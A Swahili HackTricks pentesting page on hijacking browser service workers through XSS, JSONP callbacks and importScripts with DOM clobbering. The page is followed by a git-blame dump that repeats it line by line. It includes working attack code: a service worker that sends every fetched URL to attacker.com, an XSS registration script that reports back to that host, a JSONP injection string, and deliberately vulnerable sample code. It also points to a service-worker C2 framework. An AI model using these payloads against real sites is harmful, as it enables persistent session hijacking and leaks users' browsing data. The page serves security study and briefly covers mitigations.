hacktricks/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md

# Kutumia Wafanyakazi wa Huduma

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Kikundi cha Usalama cha Kujitahidi**

<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

***

## Taarifa Msingi

**Mfanyakazi wa huduma** ni skripti inayotekelezwa na kivinjari chako nyuma, tofauti na ukurasa wowote wa wavuti, ikiruhusu vipengele visivyohitaji ukurasa wa wavuti au mwingiliano wa mtumiaji, hivyo kuimarisha uwezo wa **kupata mtandaoni na usindikaji wa nyuma**. Maelezo kamili kuhusu wafanyakazi wa huduma yanaweza kupatikana [hapa](https://developers.google.com/web/fundamentals/primers/service-workers). Kwa kudukua wafanyakazi wa huduma ndani ya kikoa dhaifu cha wavuti, wadukuzi wanaweza kupata udhibiti juu ya mwingiliano wa mwathiriwa na kurasa zote ndani ya kikoa hicho.

### Kuangalia Wafanyakazi wa Huduma Waliopo

Wafanyakazi wa huduma waliopo wanaweza kuangaliwa katika sehemu ya **Wafanyakazi wa Huduma** ya kichupo cha **Maombi** katika **Zana za Mwandishi**. Njia nyingine ni kutembelea [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) kwa mtazamo wa kina zaidi.

### Arifa za Kupiga

**Ruhusa za arifa za kupiga** zinaathiri moja kwa moja uwezo wa **mfanyakazi wa huduma** kuwasiliana na seva bila mwingiliano moja kwa moja wa mtumiaji. Ikiwa ruhusa zinakataliwa, inapunguza uwezo wa mfanyakazi wa huduma kuwa tishio la mara kwa mara. Kinyume chake, kutoa ruhusa kunazidisha hatari za usalama kwa kuruhusu kupokea na kutekeleza mbinu za udukuzi.

## Shambulio la Kuunda Mfanyakazi wa Huduma

Ili kutumia udhaifu huu unahitaji kupata:

* Njia ya **kupakia faili za JS za kupendelea** kwenye seva na **XSS ya kupakia mfanyakazi wa huduma** wa faili ya JS iliyopakiwa
* **Ombi dhaifu la JSONP** ambapo unaweza **kudhibiti matokeo (na nambari ya JS ya kupendelea)** na **XSS** ya **kupakia JSONP na mzigo** ambao uta **paki mfanyakazi wa huduma mbaya**.

Katika mfano ufuatao nitawasilisha nambari ya **kujiandikisha mfanyakazi wa huduma mpya** ambayo itasikiliza tukio la `fetch` na ita **tuma kwenye seva ya wadukuzi kila URL iliyopakiwa** (hii ni nambari utakayohitaji **kupakia** kwenye **seva** au kupakia kupitia majibu ya **JSONP dhaifu**):
```javascript
self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://attacker.com/fetch_url/' + e.request.url)
});
```
Na hii ndio nambari itakayosajili mfanyakazi (nambari unayopaswa kuweza kutekeleza kwa kutumia **XSS**). Katika kesi hii, ombi la **GET** litatumwa kwa **seva ya wachokozi** ikitoa taarifa ikiwa usajili wa mfanyakazi wa huduma ulifanikiwa au la:
```javascript
<script>
window.addEventListener('load', function() {
var sw = "/uploaded/ws_js.js";
navigator.serviceWorker.register(sw, {scope: '/'})
.then(function(registration) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/success", true);
xhttp2.send();
}, function (err) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/error", true);
xhttp2.send();
});
});
</script>
```
Katika kesi ya kutumia mwisho wa JSONP unaoweza kudhurika unapaswa kuweka thamani ndani ya `var sw`. Kwa mfano:
```javascript
var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";
```
Kuna **C2** iliyotengwa kwa **utumiaji wa Wafanyikazi wa Huduma** inayoitwa [**Shadow Workers**](https://shadow-workers.github.io) ambayo itakuwa na manufaa sana kwa kutumia udhaifu huu.

**Mwongozo wa kache wa masaa 24** unapunguza maisha ya **wafanyikazi wa huduma (SW)** wenye nia mbaya au walioathiriwa hadi masaa 24 baada ya kurekebisha udhaifu wa XSS, ikizingatiwa hali ya mteja mtandaoni. Ili kupunguza udhaifu, waendeshaji wa tovuti wanaweza kupunguza Muda wa Kuishi wa Skripti ya SW (TTL). Waendelezaji pia wanashauriwa kuunda [**kitufe cha kuzima wafanyikazi wa huduma**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) kwa kuzima haraka.

## Kutumia `importScripts` katika SW kupitia DOM Clobbering

Kazi ya **`importScripts`** iliyoitwa kutoka kwa Wafanyikazi wa Huduma inaweza **kuagiza skripti kutoka kwa kikoa tofauti**. Ikiwa kazi hii inaitwa kutumia **parameta ambayo mshambuliaji anaweza** kuhariri angekuwa na uwezo wa **kuagiza skripti ya JS kutoka kwa kikoa chake** na kupata XSS.

**Hii hata inapita kinga za CSP.**

**Mfano wa msimbo wenye udhaifu:**

* **index.html**
```html
<script>
navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);
// attacker controls location.search
</script>
```
* **sw.js**
```javascript
const searchParams = new URLSearchParams(location.search);
let host = searchParams.get('host');
self.importScripts(host + "/sw_extra.js");
//host can be controllable by an attacker
```
### Kwa Kutumia DOM Clobbering

Kwa habari zaidi kuhusu ni nini DOM Clobbering angalia:

{% content-ref url="dom-clobbering.md" %}
[dom-clobbering.md](dom-clobbering.md)
{% endcontent-ref %}

Ikiwa URL/kikoa ambapo SW inatumia kuita **`importScripts`** iko **ndani ya kipengele cha HTML**, ni **rahisi kuihariri kupitia DOM Clobbering** ili kufanya SW **ipakie script kutoka kwa kikoa chako mwenyewe**.

Kwa mfano wa hili angalia kiungo cha marejeo.

## Marejeo

* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)

**Kikundi cha Usalama cha Try Hard**

<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`# Kutumia Wafanyakazi wa Huduma`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Je, unafanya kazi katika kampuni ya usalama wa mtandao? Unataka kuona kampuni yako ikionyeshwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya la PEASS au kupakua HackTricks kwa PDF? Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Jiunge na [💬](https://emojipedia.org/speech-balloon/) [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au nifuata kwenye Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`</details>`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Kikundi cha Usalama cha Kujitahidi`

			`<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://discord.gg/tryhardsecurity" %}`

			`***`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Taarifa Msingi`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Mfanyakazi wa huduma ni skripti inayotekelezwa na kivinjari chako nyuma, tofauti na ukurasa wowote wa wavuti, ikiruhusu vipengele visivyohitaji ukurasa wa wavuti au mwingiliano wa mtumiaji, hivyo kuimarisha uwezo wa kupata mtandaoni na usindikaji wa nyuma. Maelezo kamili kuhusu wafanyakazi wa huduma yanaweza kupatikana [hapa](https://developers.google.com/web/fundamentals/primers/service-workers). Kwa kudukua wafanyakazi wa huduma ndani ya kikoa dhaifu cha wavuti, wadukuzi wanaweza kupata udhibiti juu ya mwingiliano wa mwathiriwa na kurasa zote ndani ya kikoa hicho.
a 2024-02-06 04:10:27 +01:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuangalia Wafanyakazi wa Huduma Waliopo`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Wafanyakazi wa huduma waliopo wanaweza kuangaliwa katika sehemu ya Wafanyakazi wa Huduma ya kichupo cha Maombi katika Zana za Mwandishi. Njia nyingine ni kutembelea [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) kwa mtazamo wa kina zaidi.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`### Arifa za Kupiga`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Ruhusa za arifa za kupiga zinaathiri moja kwa moja uwezo wa mfanyakazi wa huduma kuwasiliana na seva bila mwingiliano moja kwa moja wa mtumiaji. Ikiwa ruhusa zinakataliwa, inapunguza uwezo wa mfanyakazi wa huduma kuwa tishio la mara kwa mara. Kinyume chake, kutoa ruhusa kunazidisha hatari za usalama kwa kuruhusu kupokea na kutekeleza mbinu za udukuzi.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Shambulio la Kuunda Mfanyakazi wa Huduma`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Ili kutumia udhaifu huu unahitaji kupata:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Njia ya kupakia faili za JS za kupendelea kwenye seva na XSS ya kupakia mfanyakazi wa huduma wa faili ya JS iliyopakiwa`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Ombi dhaifu la JSONP ambapo unaweza kudhibiti matokeo (na nambari ya JS ya kupendelea) na XSS ya kupakia JSONP na mzigo ambao uta paki mfanyakazi wa huduma mbaya.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Katika mfano ufuatao nitawasilisha nambari ya kujiandikisha mfanyakazi wa huduma mpya ambayo itasikiliza tukio la `fetch` na ita tuma kwenye seva ya wadukuzi kila URL iliyopakiwa (hii ni nambari utakayohitaji kupakia kwenye seva au kupakia kupitia majibu ya JSONP dhaifu):
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`self.addEventListener('fetch', function(e) {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`e.respondWith(caches.match(e.request).then(function(response) {`
			`fetch('https://attacker.com/fetch_url/' + e.request.url)`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`});`
			```
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Na hii ndio nambari itakayosajili mfanyakazi (nambari unayopaswa kuweza kutekeleza kwa kutumia XSS). Katika kesi hii, ombi la GET litatumwa kwa seva ya wachokozi ikitoa taarifa ikiwa usajili wa mfanyakazi wa huduma ulifanikiwa au la:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`<script>`
			`window.addEventListener('load', function() {`
			`var sw = "/uploaded/ws_js.js";`
			`navigator.serviceWorker.register(sw, {scope: '/'})`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`.then(function(registration) {`
			`var xhttp2 = new XMLHttpRequest();`
			`xhttp2.open("GET", "https://attacker.com/SW/success", true);`
			`xhttp2.send();`
			`}, function (err) {`
			`var xhttp2 = new XMLHttpRequest();`
			`xhttp2.open("GET", "https://attacker.com/SW/error", true);`
			`xhttp2.send();`
			`});`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`});`
			`</script>`
			```
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Katika kesi ya kutumia mwisho wa JSONP unaoweza kudhurika unapaswa kuweka thamani ndani ya `var sw`. Kwa mfano:
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";`
			```
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Kuna C2 iliyotengwa kwa utumiaji wa Wafanyikazi wa Huduma inayoitwa [Shadow Workers](https://shadow-workers.github.io) ambayo itakuwa na manufaa sana kwa kutumia udhaifu huu.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Mwongozo wa kache wa masaa 24 unapunguza maisha ya wafanyikazi wa huduma (SW) wenye nia mbaya au walioathiriwa hadi masaa 24 baada ya kurekebisha udhaifu wa XSS, ikizingatiwa hali ya mteja mtandaoni. Ili kupunguza udhaifu, waendeshaji wa tovuti wanaweza kupunguza Muda wa Kuishi wa Skripti ya SW (TTL). Waendelezaji pia wanashauriwa kuunda [kitufe cha kuzima wafanyikazi wa huduma](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) kwa kuzima haraka.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			## Kutumia `importScripts` katika SW kupitia DOM Clobbering
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Kazi ya `importScripts` iliyoitwa kutoka kwa Wafanyikazi wa Huduma inaweza kuagiza skripti kutoka kwa kikoa tofauti. Ikiwa kazi hii inaitwa kutumia parameta ambayo mshambuliaji anaweza kuhariri angekuwa na uwezo wa kuagiza skripti ya JS kutoka kwa kikoa chake na kupata XSS.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Hii hata inapita kinga za CSP.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Mfano wa msimbo wenye udhaifu:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`* index.html`
			```html
			`<script>`
			`navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`// attacker controls location.search`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`</script>`
			```
			`* sw.js`
			```javascript
			`const searchParams = new URLSearchParams(location.search);`
			`let host = searchParams.get('host');`
			`self.importScripts(host + "/sw_extra.js");`
			`//host can be controllable by an attacker`
			```
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`### Kwa Kutumia DOM Clobbering`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Kwa habari zaidi kuhusu ni nini DOM Clobbering angalia:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`{% content-ref url="dom-clobbering.md" %}`
			`[dom-clobbering.md](dom-clobbering.md)`
			`{% endcontent-ref %}`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			Ikiwa URL/kikoa ambapo SW inatumia kuita `importScripts` iko ndani ya kipengele cha HTML, ni rahisi kuihariri kupitia DOM Clobbering ili kufanya SW ipakie script kutoka kwa kikoa chako mwenyewe.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Kwa mfano wa hili angalia kiungo cha marejeo.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Kikundi cha Usalama cha Try Hard`

			`<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://discord.gg/tryhardsecurity" %}`

GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`<details>`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, unataka kuona kampuni yako ikitangazwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Jiunge na [💬](https://emojipedia.org/speech-balloon/) [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au nifuatilie kwenye Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`</details>`